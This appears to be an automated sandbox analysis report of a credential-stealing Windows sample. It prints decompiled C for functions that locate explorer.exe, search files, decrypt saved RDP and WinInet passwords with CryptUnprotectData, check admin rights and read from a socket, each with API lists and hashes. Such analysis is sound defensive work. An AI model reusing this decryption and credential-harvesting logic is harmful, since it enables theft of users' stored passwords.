Download Yara Rule

C-Code - Quality: 38%

			E00402C05(void* __eax, void* __edx, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				intOrPtr _v16;
				char _v276;
				long _v304;
				void* _v312;
				void* _v316;
				int _v320;
				int _v324;
				void* _t33;
				int _t36;
				void* _t44;
				void* _t47;
				int* _t56;
				void* _t60;
				int _t64;

				if( *0x4143d1 == 0 ||  *0x4143d5 == 0 ||  *0x41440d == 0 ||  *0x414411 == 0) {
					return 0;
				} else {
					_t60 = 0;
					_v16 =  *0x4143d1();
					_v312 = 0x128;
					_t33 = CreateToolhelp32Snapshot(2, 0);
					if(_t33 != 0xffffffff) {
						_v316 = _t33;
						_t36 = Process32First(_v316,  &_v312);
						while(_t36 != 0) {
							if(StrStrIA( &_v276, "explorer.exe") == 0) {
								L23:
								_t36 = Process32Next(_v316,  &_v312);
								continue;
							} else {
								_v320 = 0;
								_t44 =  *0x4143d5(_v304,  &_v320);
								_t64 = _v320;
								if(_t44 == 0 || _t64 != _v16) {
									goto L23;
								} else {
									_t47 = OpenProcess(0x2000000, 0, _v304);
									if(_t47 == 0) {
										goto L23;
									} else {
										_v12 = _t47;
										_push( &_v8);
										_push(0x201eb);
										_push(_v12);
										if( *0x41440d() == 0) {
											CloseHandle(_v12);
											goto L23;
										} else {
											_push(_v8);
											if( *0x414411() == 0) {
												CloseHandle(_v8);
												CloseHandle(_v12);
												goto L23;
											} else {
												_t60 = _t60 + 1;
												_v324 = 0;
												_t56 =  &_v324;
												_push(_t56);
												_push(0xf003f);
												L00410E12();
												if(_t56 == 0 && _v324 != 0) {
													_push(_v324);
													_pop( *0x4140fe);
												}
												if(_a4 != 0) {
													_push(_v8);
													_pop( *__eax);
												}
											}
										}
									}
								}
							}
							break;
						}
						CloseHandle(_v316);
					}
					return _t60;
				}
			}

0x00402c1c
0x00402c3d
0x00402c40
0x00402c40
0x00402c48
0x00402c4b
0x00402c59
0x00402c61
0x00402c67
0x00402c7a
0x00402c7f
0x00402c9a
0x00402d73
0x00402d80
0x00000000
0x00402ca0
0x00402ca0
0x00402cb7
0x00402cbd
0x00402cc5
0x00000000
0x00402cd4
0x00402ce6
0x00402ce8
0x00000000
0x00402cee
0x00402cee
0x00402cf4
0x00402cf5
0x00402cfa
0x00402d05
0x00402d6e
0x00000000
0x00402d07
0x00402d07
0x00402d12
0x00402d5c
0x00402d64
0x00000000
0x00402d14
0x00402d14
0x00402d15
0x00402d1f
0x00402d25
0x00402d26
0x00402d2b
0x00402d32
0x00402d3d
0x00402d43
0x00402d43
0x00402d4e
0x00402d50
0x00402d53
0x00402d53
0x00402d55
0x00402d12
0x00402d05
0x00402ce8
0x00402cc5
0x00000000
0x00402c9a
0x00402d90
0x00402d90
0x00402d99
0x00402d99

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00402C59
Process32First.KERNEL32 ref: 00402C7A
StrStrIA.SHLWAPI(?,explorer.exe,?,00000128,00000002,00000000), ref: 00402C93
OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402CE1
RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402D2B
CloseHandle.KERNEL32(?,?,00000128,00000002,00000000), ref: 00402D90

Strings

explorer.exe, xrefs: 00402C87

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Open$CloseCreateCurrentFirstHandleProcessProcess32SnapshotToolhelp32User
String ID: explorer.exe
API String ID: 2079391467-3187896405
Opcode ID: d7b33712bffa344649a6c7b91db19c6665e4b5ef021c38cbfc5ccfe492207028
Instruction ID: ccbd0d7988a87a0baa37139996db17261bf584517116b24148bb5ef45f8ddf5c
Opcode Fuzzy Hash: d7b33712bffa344649a6c7b91db19c6665e4b5ef021c38cbfc5ccfe492207028
Instruction Fuzzy Hash: 15418B72900218ABDF219F61DD4ABDE7AB5AF04304F0085B6A104B51E1EBFC9ED1DE58

Uniqueness

Uniqueness Score: -1.00%

Function 00408789, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 104
filestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408789(void* __ecx, intOrPtr _a4, char* _a8, char* _a12) {
				struct _WIN32_FIND_DATAA _v324;
				void* _v328;
				CHAR* _v332;
				char* _v336;
				char* _t36;
				signed int _t38;
				CHAR* _t40;
				void* _t44;
				char* _t47;
				int _t50;
				int _t52;
				int _t55;
				signed int _t57;
				void* _t59;
				void* _t68;
				signed int* _t69;

				_t68 = __ecx;
				_v332 = 0;
				_t36 = _a8;
				if(_t36 == 0 ||  *_t36 == 0) {
					L20:
					return E004017D5(_v332);
				} else {
					_t38 = E004024D7(_a8);
					__eflags = _t38;
					if(_t38 != 0) {
						_t40 = E00401D15(_a8, "*.*");
					} else {
						_t40 = E00401D15(_a8, "\*.*");
					}
					_v332 = _t40;
					E00401803( &_v324, 0x13e);
					_t44 = FindFirstFileA(_v332,  &_v324);
					_v328 = _t44;
					__eflags = _t44 + 1;
					if(_t44 + 1 != 0) {
						do {
							_t69 =  &_v324;
							__eflags =  *_t69 & 0x00000010;
							if(( *_t69 & 0x00000010) == 0) {
								_v336 =  &(_t69[0xb]);
								_t47 = StrStrIA(_v336, _a12);
								__eflags = _t47;
								if(_t47 != 0) {
									E00408744(_t69, __eflags, _a4, E00401D69(E00401D15(_a8, "\\"), _v336));
									E004017D5(_t65);
								}
							} else {
								_t52 = lstrcmpiA(0x414806,  &(_t69[0xb]));
								__eflags = _t52;
								if(_t52 != 0) {
									_t55 = lstrcmpiA(0x414808,  &( &_v324->cFileName));
									__eflags = _t55;
									if(_t55 != 0) {
										_t57 = E004024D7(_a8);
										__eflags = _t57;
										if(_t57 != 0) {
											_t59 = E00401D15(_a8, 0);
										} else {
											_t59 = E00401D15(_a8, "\\");
										}
										E00408789(_t68, _a4, E00401D69(_t59,  &( &_v324->cFileName)), _a12);
										E004017D5(_t60);
									}
								}
							}
							_t50 = FindNextFileA(_v328,  &_v324);
							__eflags = _t50;
						} while (_t50 != 0);
						FindClose(_v328);
					}
					goto L20;
				}
			}

0x00408789
0x00408792
0x0040879f
0x004087a1
0x004088fe
0x0040890a
0x004087ad
0x004087b0
0x004087b5
0x004087b7
0x004087d0
0x004087b9
0x004087c1
0x004087c1
0x004087d5
0x004087e7
0x004087f9
0x004087fe
0x00408804
0x00408805
0x0040880b
0x0040880b
0x00408811
0x00408817
0x00408899
0x004088a8
0x004088ad
0x004088af
0x004088cf
0x004088d4
0x004088d4
0x00408819
0x00408822
0x00408827
0x00408829
0x0040883f
0x00408844
0x00408846
0x00408850
0x00408855
0x00408857
0x0040886d
0x00408859
0x00408861
0x00408861
0x0040888a
0x0040888f
0x0040888f
0x00408846
0x00408829
0x004088e6
0x004088eb
0x004088eb
0x004088f9
0x004088f9
0x00000000
0x00408805

APIs

FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,*.*,?), ref: 004087F9
lstrcmpiA.KERNEL32(00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 00408822
lstrcmpiA.KERNEL32(00414808,?,00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 0040883F
FindNextFileA.KERNEL32(?,?,?,?,00000000,?,?,0000013E,?,*.*,?), ref: 004088E6
FindClose.KERNEL32(?,?,?,?,?,00000000,?,?,0000013E,?,*.*,?), ref: 004088F9

Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D

Strings

*.*, xrefs: 004087C8
\*.*, xrefs: 004087B9

Memory Dump Source

Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
String ID: *.*$\*.*
API String ID: 3040542784-1692270452
Opcode ID: cc625c614b2b064663642a7af0a9cc30a593a0ba8ab8d44e069f99ff811a3761
Instruction ID: 3c8cc9b50cd0f0f031436ee2fa180d1129fc000271da3e07714d4956bd7e6d77
Opcode Fuzzy Hash: cc625c614b2b064663642a7af0a9cc30a593a0ba8ab8d44e069f99ff811a3761
Instruction Fuzzy Hash: 53314072500209AADF21BF62CD02BEE7775AF44314F5480BBB548B60B1DB7C9E909F59

Uniqueness

Uniqueness Score: -1.00%

Function 0040CEA2, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 116
stringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0040CEA2(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v20;
				signed char _v24;
				CHAR* _v28;
				signed char _v32;
				void* _v36;
				char _v40;
				void* _v44;
				char _v48;
				signed char _t40;
				signed char _t43;
				signed char _t51;
				signed char _t53;
				signed char _t55;
				signed char _t59;
				signed char _t64;
				signed char _t65;
				char _t66;

				if( *0x41442d != 0) {
					_t40 = E00401F1B(__eflags, _a8,  &_v20);
					__eflags = _t40;
					if(_t40 != 0) {
						__eflags = _v8 - 0x100000;
						if(_v8 >= 0x100000) {
							L23:
							return E00401FB0( &_v20);
						}
						_t43 = E004022C7(_v12, _v8);
						__eflags = _t43;
						if(_t43 != 0) {
							goto L23;
						}
						_v24 = E0040CDD0("username:s:", _v12, _v8);
						_v28 = E0040CDD0("password 51:b:", _v12, _v8);
						_v32 = E0040CDD0("full address:s:", _v12, _v8);
						__eflags = _v24;
						if(_v24 == 0) {
							L22:
							E004017D5(_v24);
							E004017D5(_v28);
							E004017D5(_v32);
							goto L23;
						}
						__eflags = _v28;
						if(_v28 == 0) {
							goto L22;
						}
						__eflags = _v32;
						if(_v32 != 0) {
							_t51 = lstrlenA(_v28);
							_t64 = _t51 >> 1;
							_push(_t64);
							while(1) {
								_t65 = _t64;
								__eflags = _t65;
								if(_t65 == 0) {
									break;
								}
								asm("lodsw");
								__eflags = _t51 - 0x30;
								if(_t51 < 0x30) {
									L12:
									_t53 = _t51 - 0x41 + 0xa;
									__eflags = _t53;
									L13:
									__eflags = _t53 - 0x30;
									if(_t53 < 0x30) {
										L16:
										_t55 = _t53 - 0x41 + 0xa;
										__eflags = _t55;
										L17:
										_t51 = _t55 << 0x00000004 | _t55 << 0x00000004;
										asm("stosb");
										_t64 = _t65 - 1;
										__eflags = _t64;
										continue;
									}
									__eflags = _t53 - 0x39;
									if(_t53 > 0x39) {
										goto L16;
									}
									_t55 = _t53 - 0x30;
									goto L17;
								}
								__eflags = _t51 - 0x39;
								if(_t51 > 0x39) {
									goto L12;
								}
								_t53 = _t51 - 0x30;
								goto L13;
							}
							_pop(_t66);
							_v40 = _t66;
							_push(_v28);
							_pop( *_t22);
							_v44 = 0;
							_t59 =  *0x41442d( &_v40, 0, 0, 0, 0, 1,  &_v48);
							__eflags = _t59;
							if(_t59 != 0) {
								__eflags = _v44;
								if(__eflags != 0) {
									E0040CC8E(__eflags, _a4, _v24, _v32, _v44, _v48);
									LocalFree(_v44);
								}
							}
						}
						goto L22;
					}
					return _t40;
				} else {
					return __eax;
				}
			}

0x0040ceb1
0x0040cec5
0x0040cec5
0x0040cec7
0x0040cecd
0x0040ced4
0x0040cff1
0x00000000
0x0040cff5
0x0040cee0
0x0040cee5
0x0040cee7
0x00000000
0x00000000
0x0040cefd
0x0040cf10
0x0040cf23
0x0040cf26
0x0040cf2a
0x0040cfd9
0x0040cfdc
0x0040cfe4
0x0040cfec
0x00000000
0x0040cfec
0x0040cf30
0x0040cf34
0x00000000
0x00000000
0x0040cf3a
0x0040cf3e
0x0040cf47
0x0040cf53
0x0040cf55
0x0040cf86
0x0040cf86
0x0040cf86
0x0040cf88
0x00000000
0x00000000
0x0040cf58
0x0040cf5a
0x0040cf5c
0x0040cf66
0x0040cf68
0x0040cf68
0x0040cf6a
0x0040cf6a
0x0040cf6d
0x0040cf79
0x0040cf7c
0x0040cf7c
0x0040cf7f
0x0040cf82
0x0040cf84
0x0040cf85
0x0040cf85
0x00000000
0x0040cf85
0x0040cf6f
0x0040cf72
0x00000000
0x00000000
0x0040cf74
0x00000000
0x0040cf74
0x0040cf5e
0x0040cf60
0x00000000
0x00000000
0x0040cf62
0x00000000
0x0040cf62
0x0040cf8a
0x0040cf8b
0x0040cf8e
0x0040cf91
0x0040cf94
0x0040cfad
0x0040cfb3
0x0040cfb5
0x0040cfb7
0x0040cfbb
0x0040cfcc
0x0040cfd4
0x0040cfd4
0x0040cfbb
0x0040cfb5
0x00000000
0x0040cf3e
0x0040cffd
0x0040ceb6
0x0040ceb6
0x0040ceb6

APIs

lstrlenA.KERNEL32(00000000), ref: 0040CF47
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040CFAD
LocalFree.KERNEL32(00000000), ref: 0040CFD4

Strings

full address:s:, xrefs: 0040CF19
password 51:b:, xrefs: 0040CF06
username:s:, xrefs: 0040CEF3

Memory Dump Source

Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CryptDataFreeLocalUnprotectlstrlen
String ID: full address:s:$password 51:b:$username:s:
API String ID: 2920030623-2945746679
Opcode ID: 3fe55126ee548df5cd7947a5c5ab92820d57a4bc6a1a7a61529fff14c4b352be
Instruction ID: 60ed0193d19ee7ec15275bf9add7d535b63f43271d864edcc8c9435468f68b04
Opcode Fuzzy Hash: 3fe55126ee548df5cd7947a5c5ab92820d57a4bc6a1a7a61529fff14c4b352be
Instruction Fuzzy Hash: CB412B7285010AEADF119BE1CD46BEEBB76AB48314F14023BE201711E0D6B94A92DB5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040A5BD, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88stringencryptionCOMMON

Download Yara Rule

APIs

CredEnumerateA.ADVAPI32(Microsoft_WinInet_*,00000000,00000000,00000000), ref: 0040A62F
lstrlenW.KERNEL32(00415B17,?,?,00000000), ref: 0040A66D
CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040A69D
LocalFree.KERNEL32(00000000), ref: 0040A6CF
CredFree.ADVAPI32(00000000), ref: 0040A6ED

Strings

Microsoft_WinInet_*, xrefs: 0040A62A

Memory Dump Source

Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CredFree$CryptDataEnumerateLocalUnprotectlstrlen
String ID: Microsoft_WinInet_*
API String ID: 3891647360-439986189
Opcode ID: 576424615bffc08a157af85e91cbfbecc0d476d7a66ca4336e9b72815a3144d6
Instruction ID: 303936e2a8a44d611f5ab066420c5948f3d508f4a04a3d0421c5e20b59dd798b
Opcode Fuzzy Hash: 576424615bffc08a157af85e91cbfbecc0d476d7a66ca4336e9b72815a3144d6
Instruction Fuzzy Hash: 38312972900209EBDF219F84DC0ABEEB7B4EB44305F184436E550B62D0D7B95AD4DBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00402D57, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67
registryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00402D57(void* __ebx) {
				int _t25;
				void* _t33;
				void* _t36;
				void* _t45;
				void* _t49;
				int _t51;
				void* _t52;

				_t49 = __ebx;
				while(1) {
					L15:
					while(1) {
						L17:
						_t25 = Process32Next( *(_t52 - 0x138), _t52 - 0x134);
						L1:
						if(_t25 != 0) {
							L2:
							if(StrStrIA(_t52 - 0x110, "explorer.exe") == 0) {
								L17:
								_t25 = Process32Next( *(_t52 - 0x138), _t52 - 0x134);
								goto L1;
							} else {
								L3:
								 *(_t52 - 0x13c) = 0;
								_t33 =  *0x4143d5( *(_t52 - 0x12c), _t52 - 0x13c);
								_t51 =  *(_t52 - 0x13c);
								if(_t33 == 0 || _t51 !=  *((intOrPtr*)(_t52 - 0xc))) {
									continue;
								} else {
									L5:
									_t36 = OpenProcess(0x2000000, 0,  *(_t52 - 0x12c));
									if(_t36 == 0) {
										continue;
									} else {
										L6:
										 *(_t52 - 8) = _t36;
										_push(_t52 - 4);
										_push(0x201eb);
										_push( *(_t52 - 8));
										if( *0x41440d() == 0) {
											CloseHandle( *(_t52 - 8));
											continue;
											do {
												do {
													do {
														goto L17;
													} while (StrStrIA(_t52 - 0x110, "explorer.exe") == 0);
													goto L3;
												} while (_t33 == 0 || _t51 !=  *((intOrPtr*)(_t52 - 0xc)));
												goto L5;
											} while (_t36 == 0);
											goto L6;
										} else {
											_push( *(_t52 - 4));
											if( *0x414411() == 0) {
												CloseHandle( *(_t52 - 4));
												CloseHandle( *(_t52 - 8));
												goto L15;
											} else {
												_t49 = _t49 + 1;
												 *(_t52 - 0x140) = 0;
												_t45 = _t52 - 0x140;
												_push(_t45);
												_push(0xf003f);
												L00410E12();
												if(_t45 == 0 &&  *(_t52 - 0x140) != 0) {
													 *0x4140fe =  *(_t52 - 0x140);
												}
												if( *((intOrPtr*)(_t52 + 8)) != 0) {
													 *__eax =  *(_t52 - 4);
												}
											}
										}
									}
								}
							}
						}
						CloseHandle( *(_t52 - 0x138));
						return _t49;
					}
				}
			}

0x00402d57
0x00402d69
0x00402d69
0x00402d73
0x00402d73
0x00402d80
0x00402c7f
0x00402c81
0x00402c87
0x00402c9a
0x00402d73
0x00402d80
0x00000000
0x00402ca0
0x00402ca0
0x00402ca0
0x00402cb7
0x00402cbd
0x00402cc5
0x00000000
0x00402cd4
0x00402cd4
0x00402ce6
0x00402ce8
0x00000000
0x00402cee
0x00402cee
0x00402cee
0x00402cf4
0x00402cf5
0x00402cfa
0x00402d05
0x00402d6e
0x00402d6e
0x00402d73
0x00402d73
0x00402d73
0x00000000
0x00000000
0x00000000
0x00402d73
0x00000000
0x00402d73
0x00000000
0x00402d07
0x00402d07
0x00402d12
0x00402d5c
0x00402d64
0x00000000
0x00402d14
0x00402d14
0x00402d15
0x00402d1f
0x00402d25
0x00402d26
0x00402d2b
0x00402d32
0x00402d43
0x00402d43
0x00402d4e
0x00402d53
0x00402d53
0x00402d55
0x00402d12
0x00402d05
0x00402ce8
0x00402cc5
0x00402c9a
0x00402d90
0x00402d99
0x00402d99
0x00402d73

APIs

StrStrIA.SHLWAPI(?,explorer.exe,?,00000128,00000002,00000000), ref: 00402C93
OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402CE1
RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402D2B
CloseHandle.KERNEL32(00410C2C), ref: 00402D5C
CloseHandle.KERNEL32(00410B93,00410C2C), ref: 00402D64
CloseHandle.KERNEL32(00410B93), ref: 00402D6E
Process32Next.KERNEL32 ref: 00402D80
CloseHandle.KERNEL32(?,?,00000128,00000002,00000000), ref: 00402D90

Strings

explorer.exe, xrefs: 00402C87

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseHandle$Open$CurrentNextProcessProcess32User
String ID: explorer.exe
API String ID: 2771112661-3187896405
Opcode ID: aef6317e5045ecaeae95ce1e29d41b5616d0a15dd4b1757b2ee98fb37c85f866
Instruction ID: b299d969079444cf023299e81dd2094d9188d3462d9269bcd78f4557cfd88060
Opcode Fuzzy Hash: aef6317e5045ecaeae95ce1e29d41b5616d0a15dd4b1757b2ee98fb37c85f866
Instruction Fuzzy Hash: C7213A72A00518EBDF229B61DD4ABED7A74AF04304F1440B6A104B51E1E7BC9E91DF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A774, Relevance: 4.6, APIs: 3, Instructions: 121
stringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040A774(CHAR* _a4, unsigned int* _a8) {
				void* _v8;
				char _v12;
				void* _v16;
				int _v20;
				unsigned int _t22;
				unsigned int _t23;
				intOrPtr _t25;
				void* _t28;
				unsigned int _t45;
				unsigned int _t46;
				intOrPtr* _t56;

				 *_a8 = 0;
				_t22 = lstrlenA(_a4);
				if(_t22 > 1) {
					_t23 = _t22 >> 1;
					 *_a8 = _t23;
					_t45 = _t23;
					if(_t23 < 0) {
						L25:
						return 0;
					} else {
						_t56 = _a4;
						while(1) {
							_t46 = _t45;
							if(_t46 == 0) {
								break;
							}
							_t25 =  *_t56;
							if(_t25 < 0x30 || _t25 > 0x39) {
								if(_t25 < 0x41 || _t25 > 0x46) {
									return 0;
								} else {
									_t28 = _t25 - 0x41 + 0xa;
									goto L11;
								}
							} else {
								_t28 = _t25 - 0x30;
								L11:
								if(_t28 < 0x30 || _t28 > 0x39) {
									if(_t28 < 0x41 || _t28 > 0x46) {
										return 0;
									} else {
										goto L18;
									}
								} else {
									L18:
									asm("stosb");
									_t45 = _t46 - 1;
									_t56 = _t56 + 2;
									continue;
								}
							}
							goto L26;
						}
						 *_t7 =  *_a8;
						_push(_a4);
						_pop( *_t9);
						_v16 = 0;
						if( *0x41442d == 0) {
							goto L25;
						} else {
							_push( &_v20);
							_push(1);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push( &_v12);
							if( *0x41442d() == 0 || _v16 == 0 || _v20 >  *_a8) {
								goto L25;
							} else {
								asm("cld");
								asm("jecxz 0x4");
								memcpy(_a4, _v16, _v20);
								_push(_v20);
								_pop( *__eax);
								LocalFree(_v16);
								return 1;
							}
						}
					}
				} else {
					return 0;
				}
				L26:
			}

0x0040a780
0x0040a789
0x0040a791
0x0040a79c
0x0040a7a1
0x0040a7a3
0x0040a7a5
0x0040a885
0x0040a88b
0x0040a7ab
0x0040a7ab
0x0040a80d
0x0040a80d
0x0040a80f
0x00000000
0x00000000
0x0040a7b3
0x0040a7b9
0x0040a7c8
0x0040a7dd
0x0040a7cf
0x0040a7d2
0x00000000
0x0040a7d2
0x0040a7c0
0x0040a7c0
0x0040a7e0
0x0040a7e2
0x0040a7ee
0x0040a800
0x0040a7f4
0x00000000
0x0040a7f6
0x0040a7e8
0x0040a803
0x0040a808
0x0040a809
0x0040a80a
0x00000000
0x0040a80a
0x0040a7e2
0x00000000
0x0040a7b9
0x0040a816
0x0040a819
0x0040a81c
0x0040a81f
0x0040a82d
0x00000000
0x0040a82f
0x0040a832
0x0040a833
0x0040a835
0x0040a837
0x0040a839
0x0040a83b
0x0040a840
0x0040a849
0x00000000
0x0040a85b
0x0040a85b
0x0040a865
0x0040a867
0x0040a86c
0x0040a86f
0x0040a874
0x0040a882
0x0040a882
0x0040a849
0x0040a82d
0x0040a793
0x0040a799
0x0040a799
0x00000000

APIs

lstrlenA.KERNEL32(?), ref: 0040A789
CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A841
LocalFree.KERNEL32(00000000), ref: 0040A874

Memory Dump Source

Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CryptDataFreeLocalUnprotectlstrlen
String ID:
API String ID: 2920030623-0
Opcode ID: a775da1fc8795b0329dcd1934e36d95e40dd037ff2698ef19ff8e94b293602b7
Instruction ID: ebfb9bc9a5af13da0ede983ec79a32a421a33feacbe52591692a80cc60e581d1
Opcode Fuzzy Hash: a775da1fc8795b0329dcd1934e36d95e40dd037ff2698ef19ff8e94b293602b7
Instruction Fuzzy Hash: E231B377600208DEEF24AE94DC44BCEB775EB853A4F508033E955A72C0D278DA93CA5E

Uniqueness

Uniqueness Score: -1.00%

Function 004042B2, Relevance: 4.6, APIs: 3, Instructions: 51
memoryCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E004042B2() {
				struct _SID_IDENTIFIER_AUTHORITY _v12;
				void* _v16;
				long _v20;
				char* _t16;
				int _t20;

				if( *0x4143e5 != 0 &&  *0x4143e9 != 0 &&  *0x4143ed != 0) {
					_t16 =  &_v12;
					 *_t16 = 0;
					 *((char*)(_t16 + 1)) = 0;
					 *((char*)(_t16 + 2)) = 0;
					 *((char*)(_t16 + 3)) = 0;
					 *((char*)(_t16 + 4)) = 0;
					 *((char*)(_t16 + 5)) = 5;
					_t20 = AllocateAndInitializeSid( &_v12, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v16);
					if(_t20 != 0) {
						_v20 = 0;
						_push( &_v20);
						_push(_v16);
						_push(0);
						if( *0x4143e9() == 0) {
							_v20 = 0;
						}
						FreeSid(_v16);
						return _v20;
					} else {
						return _t20;
					}
				} else {
					return 1;
				}
			}

0x004042bf
0x004042da
0x004042dd
0x004042e0
0x004042e4
0x004042e8
0x004042ec
0x004042f0
0x00404317
0x00404319
0x0040431d
0x00404327
0x00404328
0x0040432b
0x00404335
0x00404337
0x00404337
0x00404341
0x0040434b
0x0040431c
0x0040431c
0x0040431c
0x004042d3
0x004042d9
0x004042d9

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00404311
CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0040432D
FreeSid.ADVAPI32(?), ref: 00404341

Memory Dump Source

Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: c272008ddd9ff5ac31b0e59ec8a99d6d4388e5b05a8c2f2bac3df54c9546e374
Instruction ID: 8403d7bfacc3a932608c84047e01debe2ff2a77a2399b27da1d9f344307b3654
Opcode Fuzzy Hash: c272008ddd9ff5ac31b0e59ec8a99d6d4388e5b05a8c2f2bac3df54c9546e374
Instruction Fuzzy Hash: 85114475B002499EEB11CB94DC5EFDA7BF4AB91309F0880A5E520FA2E1D3B99604C75A

Uniqueness

Uniqueness Score: -1.00%

Function 004041BC, Relevance: 3.1, APIs: 2, Instructions: 57encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 00404208
LocalFree.KERNEL32(00000000), ref: 0040423C

Memory Dump Source

Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CryptDataFreeLocalUnprotect
String ID:
API String ID: 1561624719-0
Opcode ID: 71fb7d2c2897408b780e22b4e38b65f965134116e3be6dcbb1d92fa07ec4249a
Instruction ID: 8d530adce9134dd5c6d0473b1a366715ce8393482fa009439faddca2964bc4a5
Opcode Fuzzy Hash: 71fb7d2c2897408b780e22b4e38b65f965134116e3be6dcbb1d92fa07ec4249a
Instruction Fuzzy Hash: 37112B75600208EBDF118F84DC49BEE7B75FB84355F1480AAFA25772D0C3789A90CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00403879, Relevance: 1.5, APIs: 1, Instructions: 47
networkCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00403879(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v5;
				char* _t18;
				void* _t23;

				_t23 = 0;
				if(E00403819(_a4, 0x5a) != 0) {
					while(E00403819(_a4, 0x5a) != 0) {
						_push(0);
						_push(1);
						_t18 =  &_v5;
						_push(_t18);
						_push(_a4);
						L00410E84();
						if(_t18 > 0) {
							if(_v5 == _a16) {
								_t23 = 1;
							}
							_t25 =  *_a8;
							_push(0);
							_push(1);
							_push( &_v5);
							_push(_a8);
							if(E0040106A( *((intOrPtr*)( *_a8 + 0x10))(), _t25, _a8) < _a12) {
								if(_t23 == 0) {
									continue;
								}
							} else {
							}
						}
						goto L9;
					}
				}
				L9:
				return _t23;
			}

0x00403880
0x0040388e
0x00403890
0x004038a0
0x004038a2
0x004038a4
0x004038a7
0x004038a8
0x004038ab
0x004038b2
0x004038ba
0x004038bc
0x004038bc
0x004038c1
0x004038c3
0x004038c5
0x004038ca
0x004038cb
0x004038dc
0x004038e2
0x00000000
0x00000000
0x00000000
0x004038de
0x004038dc
0x00000000
0x004038b2
0x0040389e
0x004038e4
0x004038e8

APIs

Part of subcall function 00403819: select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 0040385E

recv.WSOCK32(0000003C,?,00000001,00000000,0000003C,0000005A,0000003C,0000005A,00000000), ref: 004038AB

Memory Dump Source

Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: recvselect
String ID:
API String ID: 741273618-0
Opcode ID: d5010ec86d2a16c2167cb1562ffb2a7e7d5e62fcdc5d42ef8b5a171485946c77
Instruction ID: a427b687c8d6af7e8018322dd1c8afccd8df2718942c7ca7000ea8b820f14b04
Opcode Fuzzy Hash: d5010ec86d2a16c2167cb1562ffb2a7e7d5e62fcdc5d42ef8b5a171485946c77
Instruction Fuzzy Hash: 3D01B532600209BBDF10BE51CC42B9A7FACAB10345F10C1B3F914BA1D1D7BADE419749

Uniqueness

Uniqueness Score: -1.00%

